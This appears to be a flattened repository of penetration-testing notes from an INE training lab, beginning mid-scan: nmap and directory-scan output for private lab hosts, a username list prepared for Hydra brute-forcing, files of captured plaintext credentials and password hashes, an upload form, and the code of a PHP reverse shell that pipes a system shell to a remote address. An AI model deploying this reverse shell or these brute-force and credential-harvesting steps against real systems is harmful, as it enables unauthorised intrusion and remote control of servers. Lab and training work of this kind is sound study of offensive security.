OS:TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5 OS:=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6= OS:7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N OS:%T=40%CD=S) Uptime guess: 0.130 days (since Wed Feb 24 10:38:11 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=249 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE HOP RTT ADDRESS 1 81.49 ms 172.16.64.140 Nmap scan report for 172.16.64.182 Host is up (0.067s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA) | 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA) |_ 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519) MAC Address: 00:50:56:A2:10:16 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=30201%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=60369EA8%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=104%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Uptime guess: 0.130 days (since Wed Feb 24 10:37:04 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 67.08 ms 172.16.64.182 Nmap scan report for 172.16.64.199 Host is up (0.072s latency). Not shown: 65523 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM | ms-sql-ntlm-info: | Target_Name: WIN10 | NetBIOS_Domain_Name: WIN10 | NetBIOS_Computer_Name: WIN10 | DNS_Domain_Name: WIN10 | DNS_Computer_Name: WIN10 |_ Product_Version: 10.0.10586 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2021-02-24T02:21:11 | Not valid after: 2051-02-24T02:21:11 | MD5: dae0 b306 70b0 42a9 60cc 8aa1 51d8 879e |_SHA-1: c927 8194 b1bd 732d ec07 3f2d b2d0 6a04 ce01 e77d |_ssl-date: 2021-02-24T18:46:09+00:00; +1m15s from scanner time. 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49943/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000 | ms-sql-ntlm-info: | Target_Name: WIN10 | NetBIOS_Domain_Name: WIN10 | NetBIOS_Computer_Name: WIN10 | DNS_Domain_Name: WIN10 | DNS_Computer_Name: WIN10 |_ Product_Version: 10.0.10586 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2021-02-24T02:21:11 | Not valid after: 2051-02-24T02:21:11 | MD5: dae0 b306 70b0 42a9 60cc 8aa1 51d8 879e |_SHA-1: c927 8194 b1bd 732d ec07 3f2d b2d0 6a04 ce01 e77d |_ssl-date: 2021-02-24T18:46:09+00:00; +1m14s from scanner time. MAC Address: 00:50:56:A2:AD:96 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/24%OT=135%CT=1%CU=30443%PV=Y%DS=1%DC=D%G=Y%M=005056% OS:TM=60369EA8%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=I%CI=I%II= OS:I%SS=S%TS=A)OPS(O1=M4E7NW8ST11%O2=M4E7NW8ST11%O3=M4E7NW8NNT11%O4=M4E7NW8 OS:ST11%O5=M4E7NW8ST11%O6=M4E7ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2 OS:000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M4E7NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T= OS:80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3 OS:(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O% OS:F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y OS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R OS:D=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)I OS:E(R=Y%DFI=N%T=80%CD=Z) Uptime guess: 0.134 days (since Wed Feb 24 10:32:02 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1m14s, deviation: 0s, median: 1m13s | ms-sql-info: | 172.16.64.199:1433: | Version: | name: Microsoft SQL Server 2014 RTM | number: 12.00.2000.00 | Product: Microsoft SQL Server 2014 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | nbstat: NetBIOS name: WIN10, NetBIOS user: , NetBIOS MAC: 00:50:56:a2:ad:96 (VMware) | Names: | WIN10<00> Flags: | WORKGROUP<00> Flags: |_ WIN10<20> Flags: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-02-24T18:46:04 |_ start_date: 2021-02-24T02:21:09 TRACEROUTE HOP RTT ADDRESS 1 71.66 ms 172.16.64.199 Post-scan script results: | ssh-hostkey: Possible duplicate hosts | Key 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519) used by: | 172.16.64.101 | 172.16.64.182 | Key 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA) used by: | 172.16.64.101 | 172.16.64.182 | Key 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA) used by: | 172.16.64.101 |_ 172.16.64.182 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 24 13:44:56 2021 -- 4 IP addresses (4 hosts up) scanned in 202.49 seconds ================================================ FILE: ine-labs/black-box2/alive_hosts.txt ================================================ 172.16.64.81 172.16.64.91 172.16.64.92 172.16.64.166 ================================================ FILE: ine-labs/black-box2/dot166_DONE/dirb_scan.txt ================================================ ----------------- DIRB v2.22 By The Dark Raver ----------------- OUTPUT_FILE: dirb_scan.txt START_TIME: Wed Feb 24 19:40:05 2021 URL_BASE: http://172.16.64.166:8080/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://172.16.64.166:8080/ ---- ==> DIRECTORY: http://172.16.64.166:8080/css/ ==> DIRECTORY: http://172.16.64.166:8080/img/ + http://172.16.64.166:8080/index.htm (CODE:200|SIZE:13098) ==> DIRECTORY: http://172.16.64.166:8080/js/ + http://172.16.64.166:8080/server-status (CODE:403|SIZE:303) ---- Entering directory: http://172.16.64.166:8080/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.166:8080/img/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.166:8080/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Wed Feb 24 19:44:30 2021 DOWNLOADED: 4612 - FOUND: 2 ================================================ FILE: ine-labs/black-box2/dot166_DONE/for_hydra.txt ================================================ Admin Elizabeth Elizabeth.Lopez elizabeth elizabeth.lopez Tara Tara.Backer tara tara.baker Becky Becky.Casey becky becky.casey Randy Randy.Carlson randy randy.carlson Pablo Pablo.Roberts pablo pablo.roberts Bessie Bessie.Hammond bessie bessie.hammond Gerardo Gerardo.Malone gerardo gerardo.malone Sabrina Sabrina.Summers sabrina sabrina.summers ================================================ FILE: ine-labs/black-box2/dot166_DONE/names.txt ================================================ Elizabeth Lopez Tara Baker Becky Casey Randy Carlson Pablo Roberts Bessie Hammond Gerardo Malone Sabrina Summers ================================================ FILE: ine-labs/black-box2/dot81_DONE/dirb_scan.txt ================================================ ---------------- DIRB v2.22 By The Dark Raver ----------------- OUTPUT_FILE: dirb_scan.txt START_TIME: Wed Feb 24 18:54:17 2021 URL_BASE: http://172.16.64.81/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://172.16.64.81/ ---- ==> DIRECTORY: http://172.16.64.81/default/ + http://172.16.64.81/index.html (CODE:200|SIZE:11321) + http://172.16.64.81/server-status (CODE:403|SIZE:300) ==> DIRECTORY: http://172.16.64.81/webapp/ ---- Entering directory: http://172.16.64.81/default/ ---- + http://172.16.64.81/default/index.html (CODE:200|SIZE:11321) ---- Entering directory: http://172.16.64.81/webapp/ ---- ==> DIRECTORY: http://172.16.64.81/webapp/assets/ ==> DIRECTORY: http://172.16.64.81/webapp/css/ ==> DIRECTORY: http://172.16.64.81/webapp/emails/ + http://172.16.64.81/webapp/favicon.ico (CODE:200|SIZE:300757) ==> DIRECTORY: http://172.16.64.81/webapp/img/ ==> DIRECTORY: http://172.16.64.81/webapp/includes/ + http://172.16.64.81/webapp/index.php (CODE:200|SIZE:6359) ==> DIRECTORY: http://172.16.64.81/webapp/install/ ==> DIRECTORY: http://172.16.64.81/webapp/lang/ + http://172.16.64.81/webapp/robots.txt (CODE:200|SIZE:206) ==> DIRECTORY: http://172.16.64.81/webapp/templates/ ==> DIRECTORY: http://172.16.64.81/webapp/upload/ ---- Entering directory: http://172.16.64.81/webapp/assets/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/emails/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/img/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/install/ ---- + http://172.16.64.81/webapp/install/index.php (CODE:200|SIZE:3018) ---- Entering directory: http://172.16.64.81/webapp/lang/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/templates/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.81/webapp/upload/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Wed Feb 24 19:16:07 2021 DOWNLOADED: 18448 - FOUND: 7 ================================================ FILE: ine-labs/black-box2/dot81_DONE/users.bak ================================================ john1:password123 peter:youdonotguessthatone5 ================================================ FILE: ine-labs/black-box2/dot91/dirb_scan.txt ================================================ ----------------- DIRB v2.22 By The Dark Raver ----------------- OUTPUT_FILE: dirb_scan.txt START_TIME: Thu Feb 25 18:26:50 2021 URL_BASE: http://172.16.64.91:80/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://172.16.64.91:80/ ---- + http://172.16.64.91:80/index.html (CODE:200|SIZE:11321) + http://172.16.64.91:80/server-status (CODE:403|SIZE:300) ----------------- END_TIME: Thu Feb 25 18:38:30 2021 DOWNLOADED: 4612 - FOUND: 2 ================================================ FILE: ine-labs/black-box2/dot91/gobuster_foocorp_scan.txt ================================================ ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://75ajvxi36vchsv584es1.foocorp.io/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirb/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== ===================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /app (Status: 301) /index.html (Status: 200) /server-status (Status: 403) ===================================================== ===================================================== ================================================ FILE: ine-labs/black-box2/dot91/gobuster_foocorp_scan2.txt ================================================ ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://75ajvxi36vchsv584es1.foocorp.io/app/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirb/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== ===================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.php (Status: 200) /js (Status: 301) /upload (Status: 301) ===================================================== ===================================================== ================================================ FILE: ine-labs/black-box2/dot91/gobuster_scan.txt ================================================ ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://172.16.64.91/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirb/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== ===================================================== /.hta (Status: 403) /.htpasswd (Status: 403) /.htaccess (Status: 403) /index.html (Status: 200) /server-status (Status: 403) ===================================================== ===================================================== ================================================ FILE: ine-labs/black-box2/dot91/myapp.html ================================================



Select file to upload:


© FooCORP 2021
================================================ FILE: ine-labs/black-box2/dot91/php-reverse-shell.php ================================================ array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> ================================================ FILE: ine-labs/black-box2/dot92_DONE/dirb_scan.txt ================================================ ----------------- DIRB v2.22 By The Dark Raver ----------------- OUTPUT_FILE: dirb_scan.txt START_TIME: Wed Feb 24 19:21:07 2021 URL_BASE: http://172.16.64.92/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://172.16.64.92/ ---- ==> DIRECTORY: http://172.16.64.92/assets/ ==> DIRECTORY: http://172.16.64.92/images/ + http://172.16.64.92/index.html (CODE:200|SIZE:1393) + http://172.16.64.92/server-status (CODE:403|SIZE:300) ---- Entering directory: http://172.16.64.92/assets/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.92/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Wed Feb 24 19:26:00 2021 DOWNLOADED: 4612 - FOUND: 2 ================================================ FILE: ine-labs/black-box2/dot92_DONE/user-hashes.txt ================================================ c5d71f305bb017a66c5fa7fd66535b84 14d69ee186f8d9bbeddd4da31559ce0f ================================================ FILE: ine-labs/black-box2/thorough_nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Wed Feb 24 18:44:11 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt Nmap scan report for 172.16.64.81 Host is up (0.055s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 09:1e:bf:d0:44:0f:bc:c8:64:bd:ac:16:09:79:ca:a8 (RSA) | 256 df:60:fc:fc:db:4b:be:b6:3e:7a:4e:84:4c:a1:57:7d (ECDSA) |_ 256 ce:8c:fe:bd:76:77:8e:bd:c9:b8:8e:dc:66:b8:80:38 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 13306/tcp open mysql MySQL 5.7.25-0ubuntu0.16.04.2 | mysql-info: | Protocol: 10 | Version: 5.7.25-0ubuntu0.16.04.2 | Thread ID: 7 | Capabilities flags: 63487 | Some Capabilities: ODBCClient, Support41Auth, SupportsLoadDataLocal, FoundRows, ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins | Status: Autocommit | Salt: +Y#V@\x1D4xj/2<\x17\x0D\x16\x02TEN0 |_ Auth Plugin Name: mysql_native_password MAC Address: 00:50:56:A0:8B:2B (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=31302%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Uptime guess: 0.003 days (since Wed Feb 24 18:42:27 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 54.73 ms 172.16.64.81 Nmap scan report for 172.16.64.91 Host is up (0.056s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 6379/tcp open redis Redis key-value store MAC Address: 00:50:56:A0:8B:74 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/24%OT=80%CT=1%CU=44337%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Uptime guess: 0.005 days (since Wed Feb 24 18:38:19 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE HOP RTT ADDRESS 1 55.56 ms 172.16.64.91 Nmap scan report for 172.16.64.92 Host is up (0.056s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f4:86:09:b3:d6:d1:ba:d0:28:65:33:b7:82:f7:a6:34 (RSA) | 256 3b:d7:39:c3:4f:c4:71:a2:16:91:d1:8f:ac:04:a8:16 (ECDSA) |_ 256 4f:43:ac:70:09:a6:36:c6:f5:b2:28:b8:b5:53:07:4c (ED25519) 53/tcp open domain dnsmasq 2.75 | dns-nsid: |_ bind.version: dnsmasq-2.75 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Photon by HTML5 UP 63306/tcp open mysql MySQL 5.7.25-0ubuntu0.16.04.2 | mysql-info: | Protocol: 10 | Version: 5.7.25-0ubuntu0.16.04.2 | Thread ID: 7 | Capabilities flags: 63487 | Some Capabilities: ODBCClient, Support41Auth, SupportsLoadDataLocal, FoundRows, ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins | Status: Autocommit | Salt: g\x04\x1A6\x0FqO\x0D\x18uo[d:I"z/\x10\x11 |_ Auth Plugin Name: mysql_native_password MAC Address: 00:50:56:A0:0B:82 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=38636%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Uptime guess: 0.007 days (since Wed Feb 24 18:36:09 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 55.71 ms 172.16.64.92 Nmap scan report for 172.16.64.166 Host is up (0.056s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a6:1e:f8:c6:eb:32:0a:f6:29:c8:de:86:b7:4c:a0:d7 (RSA) | 256 b9:94:56:c7:4d:63:ad:bd:2d:5e:26:43:75:78:07:6f (ECDSA) |_ 256 d6:82:45:0a:51:4e:01:2d:6a:be:fa:cf:75:de:46:a0 (ED25519) 8080/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Ucorpora Demo MAC Address: 00:50:56:A0:B1:E8 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/24%OT=2222%CT=1%CU=35822%PV=Y%DS=1%DC=D%G=Y%M=005056 